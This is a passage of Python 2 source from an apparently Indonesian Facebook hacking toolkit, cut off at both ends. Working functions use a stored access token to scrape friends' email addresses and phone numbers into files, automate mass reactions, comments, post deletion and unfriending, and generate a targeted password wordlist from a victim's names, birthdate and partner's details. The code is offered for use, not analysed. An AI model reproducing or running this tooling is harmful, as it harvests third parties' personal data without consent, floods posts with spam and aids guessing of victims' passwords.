print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def emailfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(emfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def hpfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hpfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Bot Reactions Target Post'
print '\x1b[1;37;40m2. Bot Reactions Grup Post'
print '\x1b[1;37;40m3. Bot Komen Target Post'
print '\x1b[1;37;40m4. Bot Komen Grup Post'
print '\x1b[1;37;40m5. Mass delete Post'
print '\x1b[1;37;40m6. Terima permintaan pertemanan'
print '\x1b[1;37;40m7. Hapus pertemanan'
print '\x1b[1;31;40m0. Kembali'
print
bot_pilih()
def bot_pilih():
bots = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Jangan kosong'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mTidak ada'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Kembali'
print
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Jangan kosong'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Kembali'
print
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Jangan kosong'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mMulai menghapus postingan unfaedah\x1b[1;97m ...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mGagal'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mTerhapus'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
teman = json.loads(r.text)
if '[]' in str(teman['data']):
print '\x1b[1;91m[!] Tidak ada permintaan pertemanan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in teman['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Gagal'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mTerhapus\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Buat postingan'
print '\x1b[1;37;40m2. Buat Wordlist'
print '\x1b[1;37;40m3. Akun Checker'
print '\x1b[1;37;40m4. Lihat daftar grup'
print '\x1b[1;37;40m5. Profile Guard'
print
print '\x1b[1;97m ->Coming soon<-'
print
print '\x1b[1;31;40m0. Kembali'
print
pilih_lain()
def pilih_lain():
other = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mTidak ada'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mKetik status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Jangan kosong'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 40 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, 